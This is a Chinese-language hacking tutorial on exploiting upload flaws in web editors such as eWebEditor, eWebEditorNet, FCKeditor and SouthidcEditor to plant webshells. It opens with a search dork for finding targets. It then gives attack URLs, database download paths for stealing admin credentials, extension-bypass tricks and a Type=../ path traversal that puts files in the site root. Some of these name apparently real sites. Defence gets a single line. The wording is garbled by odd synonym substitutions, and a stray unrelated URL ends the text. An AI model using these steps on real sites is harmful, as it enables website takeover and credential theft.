site:editor inurl:asp?id inurl:ewebeditornet　　好比常见的编辑器破绽有:　　ewebeditor　　ewebeditornet　　fckeditor　　editor　　southidceditor　　SouthidcEditor　　bigcneditor　　一:ewebeditor为例　　1:默认下载下来的后台:　　http://www.test.com/ewebeditor/admin_login.asp　　后台若是能进入:　　可点击样式治理:　　standard 拷贝一份(直接修改改不了)　　在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览　　在编辑器里点设计 然后直接上传asa大马.　　上传后 在代码里可以看到马的位置!　　(原理:由于在iis里 网站的属性里 应用程序设置一项 asa扩展名照样用asp.dll来剖析的,asp也是 另有 cer cdx )　　在cer cdx asa的被删掉 那么马儿就找不到 映射不过去.　　可以在拷贝事后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件　　2:下载默认数据库　　www.test.com/ewebeditor/db/ewebeditor.mdb　　然后剖析数据库　　webeditor_system(1) 就可以看到用户名和密码 若是破解不出来　　可以在webeditor_style(14 样式内外　　主要看允许上传文件的扩展名(s-fileext s_ingeext)　　看到一个小黑客曾经搞过 多了asa aaspsp　　可以用他来行使!(后台找不到的情况下也可以用此方式)　　可以组织语句:　　好比 ID=46 s-name =standard1　　组织 代码: ewebeditor.asp?id=contentamp;style=standard　　ID和和样式名改事后　　ewebeditor.asp?id=46amp;style=standard1　　然后就是进入编辑器 上传asa 或者asp的 获得webshell　　二:ewebeditornet 破绽行使　　默认上传地址:　　www.test.com/ewebeditornet/upload.aspx　　可以直接上传一个cer的木马　　在无法上传的情况下　　可以地址栏组织以下代码: javascript:lbtnUpload.click();　　然后查看源代码:　　找到uploadsave 找到地址　　默认传到uploadfile这个文件夹里　　(破绽修补: 可以在iss里直接把upload文件夹的执行权限选择无. )　　三:fckeditor 破绽行使　　http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUploadamp;Type=Imageamp;CurrentFolder=/　　就把文件名字段改成NEWfile 选择文件名可界说　　上传事后在/userfiles/image/找文件　　四：southidceditor　　http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb　　http://www.xhkjit.com/admin/southidceditor/popup.asp　　http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp　　五：bigcneditor　　这个页不多说了　　原理都差不多！　　提防方式很简单就不多讲了，　　FCKeditor上传破绽,　　http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=allamp;Connector=connectors/asp/connector.asp　　打开这个地址就可以上传任何类型的文件了，马儿上传到的位置是:　　http://www.xxx.com/UserFiles/all/1.asa　　"Type=all" 这个变量是自己界说的,在这里创建了all这个目录,而且新的目录没有上传文件花样的限制.　　好比输入:　　http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyeramp;Connector=connectors/asp/connector.asp　　所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了　　而 若是这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../amp;Connector=connectors/asp/connector.asp　　就可以传到网站的根目录下,网站支持什么剧本,传什么剧本的马就可以了.　　所传的文件就到了网站根目录下了　　http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46amp;threadID=amp;messageID=amp;ListType=FromForumamp;FromCurrentPage=1amp;time=